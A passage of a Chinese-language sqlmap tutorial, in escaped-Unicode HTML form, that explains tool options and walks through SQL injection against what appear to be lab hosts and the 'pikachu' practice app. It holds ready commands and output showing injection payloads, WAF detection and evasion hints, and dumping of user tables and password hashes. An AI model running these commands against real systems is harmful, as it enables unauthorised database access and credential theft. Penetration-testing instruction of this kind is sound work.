$ python sqlmap.py -u \"http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1\" --parse-errors\n[...]\n[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right\nnumber of query columns. Automatically extending the range for current UNION query injection technique test\n11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)\n[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number\nof items in the select list.\n<b>\/sqlmap\/mssql\/iis\/get_int.asp, line 27<\/b>'\n[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)\n[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of\nitems in the select list.\n<b>\/sqlmap\/mssql\/iis\/get_int.asp, line 27<\/b>'\n[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)\n[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of\nitems in the select list.\n<b>\/sqlmap\/mssql\/iis\/get_int.asp, line 27<\/b>'\n[11:12:17] [INFO] target URL appears to have 3 columns in query\n[...]<\/code><\/pre>\n
\u5176\u4ed6\u53c2\u6570<\/h1>\n
\u4f7f\u7528\u53c2\u6570\u7f29\u5199<\/h2>\n
\u53c2\u6570\uff1a-z<\/p>\n
\u6709\u4f7f\u7528\u53c2\u6570\u592a\u957f\u592a\u590d\u6742\uff0c\u53ef\u4ee5\u4f7f\u7528\u7f29\u5199\u6a21\u5f0f\u3002 \u4f8b\u5982\uff1a<\/p>\n
python sqlmap.py –batch –random-agent –ignore-proxy –technique=BEU -u "www.target.com\/vuln.php?id=1"<\/p>\n
\u53ef\u4ee5\u5199\u6210\uff1a<\/p>\n
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com\/vuln.php?id=1"<\/p>\n
\u8fd8\u6709\uff1a<\/p>\n
python sqlmap.py –ignore-proxy –flush-session –technique=U –dump -D testdb -T users -u<\/p>\n
"www.target.com\/vuln.php?id=1"<\/p>\n
\u53ef\u4ee5\u5199\u6210\uff1a<\/p>\n
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com\/vuln.php?id=1"<\/p>\n
\u6210\u529fSQL\u6ce8\u5165\u65f6\u8b66\u544a<\/h2>\n
\u53c2\u6570\uff1a–alert<\/p>\n
\u8bbe\u5b9a\u4f1a\u53d1\u7684\u7b54\u6848<\/h2>\n
\u53c2\u6570\uff1a–answers<\/p>\n
\u5f53\u5e0c\u671bsqlmap\u63d0\u51fa\u8f93\u5165\u65f6\uff0c\u81ea\u52a8\u8f93\u5165\u81ea\u5df1\u60f3\u8981\u7684\u7b54\u6848\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff1a \u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.22.128\/sqlmap\/mysql\/get_int.php?id=1\"--technique=E --\nanswers=\"extending=N\" --batch\n[...]\n[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'\nheuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads\nspecific for other DBMSes? [Y\/n] Y\n[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)?\n[Y\/n] N\n[...]<\/code><\/pre>\n
\u53d1\u73b0SQL\u6ce8\u5165\u65f6\u53d1\u51fa\u8702\u9e23\u58f0<\/h2>\n
\u53c2\u6570\uff1a–beep<\/p>\n
\u53d1\u73b0sql\u6ce8\u5165\u65f6\uff0c\u53d1\u51fa\u8702\u9e23\u58f0\u3002<\/p>\n
\u542f\u53d1\u5f0f\u68c0\u6d4bWAF\/IPS\/IDS\u4fdd\u62a4<\/h2>\n
\u53c2\u6570\uff1a–check-waf<\/p>\n
WAF\/IPS\/IDS\u4fdd\u62a4\u53ef\u80fd\u4f1a\u5bf9sqlmap\u9020\u6210\u5f88\u5927\u7684\u56f0\u6270\uff0c\u5982\u679c\u6000\u7591\u76ee\u6807\u6709\u6b64\u9632\u62a4\u7684\u8bdd\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u6765\u6d4b\u8bd5\u3002 sqlmap\u5c06\u4f1a\u4f7f\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684<\/p>\n
\u53c2\u6570\u6765\u6ce8\u5165\u6d4b\u8bd5<\/p>\n
\u4f8b\u5982\uff1a<\/p>\n
&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1<\/p>\n
\u5982\u679c\u6709\u4fdd\u62a4\u7684\u8bdd\u53ef\u80fd\u8fd4\u56de\u7ed3\u679c\u4f1a\u4e0d\u540c\u3002<\/p>\n
\u6e05\u7406sqlmap\u7684UDF(s)\u548c\u8868<\/h2>\n
\u53c2\u6570\uff1a–cleanup<\/p>\n
\u6e05\u9664sqlmap\u6ce8\u5165\u65f6\u4ea7\u751f\u7684udf\u4e0e\u8868\u3002<\/p>\n
\u7981\u7528\u5f69\u8272\u8f93\u51fa<\/h2>\n
\u53c2\u6570\uff1a–desable-coloring<\/p>\n
sqlmap\u9ed8\u8ba4\u5f69\u8272\u8f93\u51fa\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u7981\u6389\u5f69\u8272\u8f93\u51fa\u3002<\/p>\n
\u4f7f\u7528\u6307\u5b9a\u7684Google\u7ed3\u679c\u9875\u9762<\/h2>\n
\u53c2\u6570\uff1a–gpage<\/p>\n
\u9ed8\u8ba4sqlmap\u4f7f\u7528\u524d100\u4e2aURL\u5730\u5740\u4f5c\u4e3a\u6ce8\u5165\u6d4b\u8bd5\uff0c\u7ed3\u5408\u6b64\u9009\u9879\uff0c\u53ef\u4ee5\u6307\u5b9a\u9875\u9762\u7684URL\u6d4b\u8bd5\u3002<\/p>\n
\u4f7f\u7528HTTP\u53c2\u6570\u6c61\u67d3<\/h2>\n
\u53c2\u6570\uff1a–hpp<\/p>\n
HTTP\u53c2\u6570\u6c61\u67d3\u53ef\u80fd\u4f1a\u7ed5\u8fc7WAF\/IPS\/IDS\u4fdd\u62a4\u673a\u5236\uff0c\u8fd9\u4e2a\u5bf9ASP\/IIS\u4e0eASP.NET\/IIS\u5e73\u53f0\u5f88\u6709\u6548\u3002<\/p>\n
\u6d4b\u8bd5WAF\/IPS\/IDS\u4fdd\u62a4<\/h2>\n
\u53c2\u6570\uff1a–identify-waf<\/p>\n
sqlmap\u53ef\u4ee5\u5c1d\u8bd5\u627e\u51faWAF\/IPS\/IDS\u4fdd\u62a4\uff0c\u65b9\u4fbf\u7528\u6237\u505a\u51fa\u7ed5\u8fc7\u65b9\u5f0f\u3002\u76ee\u524d\u5927\u7ea6\u652f\u630130\u79cd\u4ea7\u54c1\u7684\u8bc6\u522b\u3002<\/p>\n
\u4f8b\u5982\u5bf9\u4e00\u4e2a\u53d7\u5230ModSecurity WAF\u4fdd\u62a4\u7684MySQL\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.21.128\/sqlmap\/mysql\/get_int.php?id=1\" --identify-waf -v 3\n[...]\n[xx:xx:23] [INFO] testing connection to the target URL\n[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'\n[xx:xx:23] [INFO] using WAF scripts to detect backend WAF\/IPS\/IDS protection\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'USP Secure Entry Server (United Security Providers)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'NetContinuum Web Application Firewall\n(NetContinuum\/Barracuda Networks)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Hyperguard Web Application Firewall (art of defence\nInc.)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'TrafficShield (F5 Networks)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Teros\/Citrix Application Firewall Enterprise\n(Teros\/Citrix Systems)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'KONA Security Solutions (Akamai Technologies)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Incapsula Web Application Firewall (Incapsula\/Imperva)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'webApp.secure (webScurity)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Proventia Web Application Security (IBM)'\n[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'\n[xx:xx:23] [DEBUG] page not found (404)\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'KS-WAF (Knownsec)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'NetScaler (Citrix Systems)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'Jiasule Web Application Firewall (Jiasule)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'WebKnight Application Firewall (AQTRONIX)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'AppWall (Radware)'\n[xx:xx:23] [DEBUG] checking for WAF\/IDS\/IPS product 'ModSecurity: Open Source Web Application Firewall\n(Trustwave)'\n[xx:xx:23] [CRITICAL] WAF\/IDS\/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'.\nPlease consider usage of tamper scripts (option '--tamper')\n[...]<\/code><\/pre>\n
\u6a21\u4eff\u667a\u80fd\u624b\u673a<\/p>\n
\u53c2\u6570\uff1a–mobile<\/p>\n
\u6709\u65f6\u670d\u52a1\u7aef\u53ea\u63a5\u6536\u79fb\u52a8\u7aef\u7684\u8bbf\u95ee\uff0c\u6b64\u65f6\u53ef\u4ee5\u8bbe\u5b9a\u4e00\u4e2a\u624b\u673a\u7684User-Agent\u6765\u6a21\u4eff\u624b\u673a\u767b\u9646\u3002<\/p>\n
\u4f8b\u5982\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/www.target.com\/vuln.php?id=1\" --mobile\n[...]\nwhich smartphone do you want sqlmap to imitate through HTTP User-Agent header?\n[1] Apple iPhone 4s (default)\n[2] BlackBerry 9900\n[3] Google Nexus 7\n[4] HP iPAQ 6365\n[5] HTC Sensation\n[6] Nokia N97\n[7] Samsung Galaxy S\n> 1\n[...]<\/code><\/pre>\n
\u5b89\u5168\u7684\u5220\u9664output\u76ee\u5f55\u7684\u6587\u4ef6<\/h2>\n
\u53c2\u6570\uff1a–purge-output<\/p>\n
\u6709\u65f6\u9700\u8981\u5220\u9664\u7ed3\u679c\u6587\u4ef6\uff0c\u800c\u4e0d\u88ab\u6062\u590d\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u539f\u6709\u6587\u4ef6\u5c06\u4f1a\u88ab\u968f\u673a\u7684\u4e00\u4e9b\u6587\u4ef6\u8986\u76d6\u3002<\/p>\n
\u4f8b\u5982\uff1a<\/p>\n
$ python sqlmap.py --purge-output -v 3\n[...]\n[xx:xx:55] [INFO] purging content of directory '\/home\/user\/sqlmap\/output'...\n[xx:xx:55] [DEBUG] changing file attributes\n[xx:xx:55] [DEBUG] writing random data to files\n[xx:xx:55] [DEBUG] truncating files\n[xx:xx:55] [DEBUG] renaming filenames to random values\n[xx:xx:55] [DEBUG] renaming directory names to random values\n[xx:xx:55] [DEBUG] deleting the whole directory tree\n[...]<\/code><\/pre>\n
\u542f\u53d1\u5f0f\u5224\u65ad\u6ce8\u5165<\/h2>\n
\u53c2\u6570\uff1a–smart<\/p>\n
\u6709\u65f6\u5bf9\u76ee\u6807\u975e\u5e38\u591a\u7684URL\u8fdb\u884c\u6d4b\u8bd5\uff0c\u4e3a\u8282\u7701\u65f6\u95f4\uff0c\u53ea\u5bf9\u80fd\u591f\u5feb\u901f\u5224\u65ad\u4e3a\u6ce8\u5165\u7684\u62a5\u9519\u70b9\u8fdb\u884c\u6ce8\u5165\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u3002<\/p>\n
\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.21.128\/sqlmap\/mysql\/get_int.php?ca=17&user=foo&id=1\" --batch --smart\n[...]\n[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic\n[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic\n[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable\n[xx:xx:14] [INFO] skipping GET parameter 'ca'\n[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic\n[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic\n[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable\n[xx:xx:14] [INFO] skipping GET parameter 'user'\n[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic\n[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic\n[xx:xx:14] [INFO] GET parameter 'id' is dynamic\n[xx:xx:14] [WARNING] reflective value(s) found and filtering out\n[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS:\n'MySQL')\n[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'\nheuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads\nspecific for other DBMSes? [Y\/n] Y\ndo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y\/n] Y\n[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable\n[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'\n[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable\n[xx:xx:14] [INFO] testing 'MySQL inline queries'\n[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'\n[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'\n[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'\n[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable\n[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'\n[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at\nleast one other potential injection technique found\n[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right\nnumber of query columns. Automatically extending the range for current UNION query injection technique test\n[xx:xx:24] [INFO] target URL appears to have 3 columns in query\n[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable\n[...]<\/code><\/pre>\n
\u521d\u7ea7\u7528\u6237\u5411\u5bfc\u53c2\u6570<\/h1>\n
\u53c2\u6570\uff1a–wizard \u9762\u5411\u521d\u7ea7\u7528\u6237\u7684\u53c2\u6570\uff0c\u53ef\u4ee5\u4e00\u6b65\u4e00\u6b65\u6559\u4f60\u5982\u4f55\u8f93\u5165\u9488\u5bf9\u76ee\u6807\u6ce8\u5165\u3002<\/p>\n
$ python sqlmap.py --wizard\nsqlmap\/1.0-dev-2defc30 - automatic SQL injection and database takeover tool\nhttp:\/\/sqlmap.org\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the\nend user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability\nand are not responsible for any misuse or damage caused by this program\n[*] starting at 11:25:26\nPlease enter full target URL (-u): http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1\nPOST data (--data) [Enter for None]:\nInjection difficulty (--level\/--risk). Please choose:\n[1] Normal (default)\n[2] Medium\n[3] Hard\n> 1\nEnumeration (--banner\/--current-user\/etc). Please choose:\n[1] Basic (default)\n[2] Smart\n[3] All\n> 1\nsqlmap is running, please wait..\nheuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip\ntest payloads specific for other DBMSes? [Y\/n] Y\ndo you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y\/n] Y\nGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y\/N] N\nsqlmap identified the following injection points with a total of 25 HTTP(s) requests:\n---\nPlace: GET\nParameter: id\nType: boolean-based blind\nTitle: AND boolean-based blind - WHERE or HAVING clause\nPayload: id=1 AND 2986=2986\nType: error-based\nTitle: Microsoft SQL Server\/Sybase AND error-based - WHERE or HAVING clause\nPayload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN\n(4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))\nType: UNION query\nTitle: Generic UNION query (NULL) - 3 columns\nPayload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79)\nCHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109)\nCHAR(113) CHAR(58)--\nType: stacked queries\nTitle: Microsoft SQL Server\/Sybase stacked queries\nPayload: id=1; WAITFOR DELAY '0:0:5'--\nType: AND\/OR time-based blind\nTitle: Microsoft SQL Server\/Sybase time-based blind\nPayload: id=1 WAITFOR DELAY '0:0:5'--\nType: inline query\nTitle: Microsoft SQL Server\/Sybase inline queries\nPayload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN\nCHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))\n---\nweb server operating system: Windows XP\nweb application technology: ASP, Microsoft IIS 5.1\nback-end DBMS operating system: Windows XP Service Pack 2\nback-end DBMS: Microsoft SQL Server 2005\nbanner:\n---\nMicrosoft SQL Server 2005 - 9.00.1399.06 (Intel X86)\nOct 14 2005 00:33:37\nCopyright (c) 1988-2005 Microsoft Corporation\nExpress Edition on Windows NT 5.1 (Build 2600: Service Pack 2)\n---\ncurrent user: 'sa'\ncurrent database: 'testdb'\ncurrent user is DBA: True\n[*] shutting down at 11:25:52<\/code><\/pre>\n
SQLMAP\u5b9e\u6218\u4e00<\/h1>\n
\u68c0\u6d4b\u6ce8\u5165<\/h2>\n
\u68c0\u6d4bURL GET\u53c2\u6570\u7684\u662f\u5426\u5b58\u5728\u6ce8\u5165<\/p>\n
-u \u68c0\u6d4b\u7684url<\/p>\n
""\u53cc\u5f15\u53f7 \u8868\u793a\u8fd9\u662f\u4e00\u6bb5\u5b57\u7b26\u4e32<\/p>\n
–dbms \u6307\u5b9a\u653b\u51fb\u7684\u6570\u636e\u5f15\u64ce<\/p>\n
-v \u8f93\u51fa\u4fe1\u606f\u767b\u8bb0\u4e3a1<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1<\/code><\/p>\n
\u8f93\u5165\u4e4b\u540esqlmap\u4f1a\u81ea\u52a8\u8fdb\u884c\u6ce8\u5165\uff0c\u4f46\u662f\u4f1a\u6709\u4e00\u4e9b\u8fdb\u884c\u63d0\u793a \u9700\u8981\u4f60\u5728\u7ec8\u7aef\u8fdb\u884c\u786e\u8ba4 \u5982\u679c\u4f7f\u7528–batch \u4f1a\u81ea\u52a8\u8fdb\u884c\u9ed8\u8ba4\u64cd\u4f5c\uff0c\u4e0d\u7528\u8fdb\u884c\u4ea4\u4e92\u4fe1\u606f\u786e\u5b9a<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 --batch<\/code><\/p>\n
\u7a0b\u5e8f\u4f1a\u81ea\u52a8\u786e\u8ba4\u8fdb\u884cSQL\u6ce8\u5165\u68c0\u6d4b\uff0c\u770b\u5230\u5b58\u5728\u6ce8\u5165\u7684\u53c2\u6570\u548c\u653b\u51fbpayload \u4e5f\u4f1a\u663e\u793a\u6ce8\u5165\u7684\u7c7b\u578b<\/p>\n
time-based blind \u65f6\u95f4\u76f2\u6ce8\u5165<\/p>\n
UNION query \u8054\u5408\u6ce8\u5165<\/p>\n
\u83b7\u53d6\u654f\u611f\u4fe1\u606f<\/h2>\n
\u786e\u5b9a\u5b58\u5728\u6ce8\u5165\u4e4b\u540e \u63a5\u7740\u901a\u8fc7\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u547d\u4ee4 \u83b7\u53d6<\/p>\n
–current-user \u7528\u6237\u8fde\u63a5\u7684\u7528\u6237<\/p>\n
–currnet-db \u5f53\u524d\u5e93<\/p>\n
–is-dba \u662f\u5426root\u6743\u9650<\/p>\n
–passwords \u83b7\u53d6\u6570\u636e\u5e93\u7684\u5bc6\u7801 \u4f7f\u7528\u8fd9\u4e2a\u547d\u4ee4 sqlmap\u627e\u5230\u5bc6\u6587\u65f6\uff0c\u4f1a\u63d0\u793a\u4f60\u662f\u5426\u8fdb\u884chash\u7834\u89e3 \u5982\u679c\u9700\u8981\u9009\u62e9\u5408\u9002\u7684\u5b57\u5178<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql --current-user --current-db --is-dba --passwords -v 1<\/code><\/p>\n
\u83b7\u53d6\u6240\u6709\u5e93<\/h2>\n
sqlmap -u \"http:\/\/192.168.0.165\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" -v 1 --dbms mysql --batch --dbs<\/code><\/p>\n
\u83b7\u53d6\u8868<\/h2>\n
\u5728\u83b7\u53d6\u5f53\u524d\u5e93\u3001\u53ef\u4ee5\u6839\u636e\u5e93\u5217\u51fa\u8868\u3002<\/p>\n
-D \u6307\u5b9a\u5e93<\/p>\n
–tables \u5217\u51fa\u6240\u6709\u8868<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu --tables<\/code><\/p>\n
\u83b7\u53d6\u8868\u7684\u5b57\u6bb5<\/h2>\n
\u83b7\u53d6\u67d0\u4e2a\u8868\u7684\u6240\u6709\u5b57\u6bb5<\/p>\n
-T \u6307\u5b9a\u67d0\u4e2a\u8868<\/p>\n
–columns \u83b7\u53d6\u5b57\u6bb5<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -T users --columns<\/code><\/p>\n
\u83b7\u53d6\u67d0\u4e2a\u5e93\u7684\u6240\u6709\u8868\u7684\u6240\u6709\u5b57\u6bb5<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -tables --columns<\/code><\/p>\n
\u83b7\u53d6\u6570\u636e<\/h2>\n
–dump \u662f\u5bfc\u51fa\u6570\u636e\u6240\u6709\u5185\u5bb9<\/p>\n
–dump -C "username,password" \u83b7\u53d6\u5b57\u6bb5\u7684\u5185\u5bb9<\/p>\n
\u83b7\u53d6\u6307\u5b9a\u5e93\u6240\u6709\u8868 \u6240\u6709\u5b57\u6bb5\u5185\u5bb9<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -tables --columns --dump<\/code><\/p>\n
\u83b7\u53d6\u6307\u5b9a\u8868\u7684 \u6240\u6709\u5b57\u6bb5\u5185\u5bb9<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -T users --columns --dump<\/code><\/p>\n
\u83b7\u53d6\u6307\u5b9a \u8868 \u6307\u5b9a\u5b57\u6bb5\u5185\u5bb9<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -T users -C \"id,username,password\" --dump<\/code><\/p>\n
\u83b7\u53d6\u6307\u5b9a\u6761\u6570<\/h2>\n
\u83b7\u53d6\u603b\u6761\u6570<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -T users --count<\/code><\/p>\n
\u83b7\u53d6\u6307\u5b9aid\u6761\u6570<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -T users --dump --start 1 --stop 3<\/code><\/p>\n
\u5220\u9664\u7f13\u5b58\u6587\u4ef6<\/h2>\n
\u53c2\u6570\uff1a–flush-session<\/p>\n
\u5982\u679c\u4e0d\u60f3\u7528\u4e4b\u524d\u7f13\u5b58\u8fd9\u4e2a\u76ee\u6807\u7684session\u6587\u4ef6\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u3002 \u4f1a\u6e05\u7a7a\u4e4b\u524d\u7684session\uff0c\u91cd\u65b0\u6d4b\u8bd5\u8be5\u76ee\u6807<\/p>\n
\u5b89\u5168\u7684\u5220\u9664output\u76ee\u5f55\u7684\u6587\u4ef6<\/h2>\n
\u53c2\u6570\uff1a–purge-output<\/p>\n
\u6709\u65f6\u9700\u8981\u5220\u9664\u7ed3\u679c\u6587\u4ef6\uff0c\u800c\u4e0d\u88ab\u6062\u590d\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u539f\u6709\u6587\u4ef6\u5c06\u4f1a\u88ab\u968f\u673a\u7684\u4e00\u4e9b\u6587\u4ef6\u8986\u76d6\u3002<\/p>\n
SQLMAP\u5b9e\u6218\u4e8c<\/h1>\n
–technique \u4f7f\u7528\u6307\u5b9a\u7684\u6ce8\u5165\u65b9\u5f0f<\/h2>\n
\u5728\u4e00\u4e9b\u5b9e\u6218\u9879\u76ee\u4e2d\uff0c\u96be\u514d\u4f1a\u9047\u4e0a \u7f51\u7edc\u53cd\u5e94\u7f13\u6162\uff0cidc\u8fd8\u6709\u68c0\u6d4bsqlmap\u7684\u80fd\u529b\uff0c\u6240\u4ee5\u4f5c\u4e3a\u4e00\u4e2a\u4e13\u4e1a\u7684\u6e17\u900f\u6d4b\u8bd5\u4eba\u5458\uff0c\u5fc5\u987b\u505a\u5230\u5feb\u51c6\u72e0\u3002<\/p>\n
\u6709\u4e9bSQL\u6ce8\u5165\u70b9 \u53ea\u5141\u8bb8\u65f6\u95f4\u6ce8\u5165\uff0c\u8fd9\u65f6\u6307\u5b9aSQLMAP\u7684\u6ce8\u5165\u7c7b\u578b\u4e3aT<\/p>\n
\u4ee5\u4e0b\u662f–technique \u53c2\u6570\u7684\u503c\u7684\u89e3\u91ca<\/p>\n
\n
B:Boolean-basedblindSQLinjection\uff08\u5e03\u5c14\u578b\u6ce8\u5165\uff09<\/p>\n
E:Error-basedSQLinjection\uff08\u62a5\u9519\u578b\u6ce8\u5165\uff09<\/p>\n
U:UNIONquerySQLinjection\uff08\u53ef\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff09<\/p>\n
S:StackedqueriesSQLinjection\uff08\u53ef\u591a\u8bed\u53e5\u67e5\u8be2\u6ce8\u5165\uff09<\/p>\n
T:Time-basedblindSQLinjection\uff08\u57fa\u4e8e\u65f6\u95f4\u5ef6\u8fdf\u6ce8\u5165\uff09<\/p>\n
Q:InlineSQLInjection(\u5185\u8054\u6ce8\u5165)<\/p>\n<\/blockquote>\n
\u4f7f\u7528\u57fa\u4e8e\u65f6\u95f4\u7684\u5ef6\u65f6\u6ce8\u5165<\/h2>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 3 -D pikachu --technique=T<\/code><\/p>\n
\u652f\u6301\u591a\u79cd\u6ce8\u5165\u68c0\u6d4b \u9ed8\u8ba4\u662f\u5168\u90e8<\/p>\n
sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 3 -D pikachu --technique=BEUT<\/code><\/p>\n
\u6ce8\u5165\u65f6\u4f7f\u7528\u968f\u673a\u7684 HTTP User-Agent<\/h2>\n
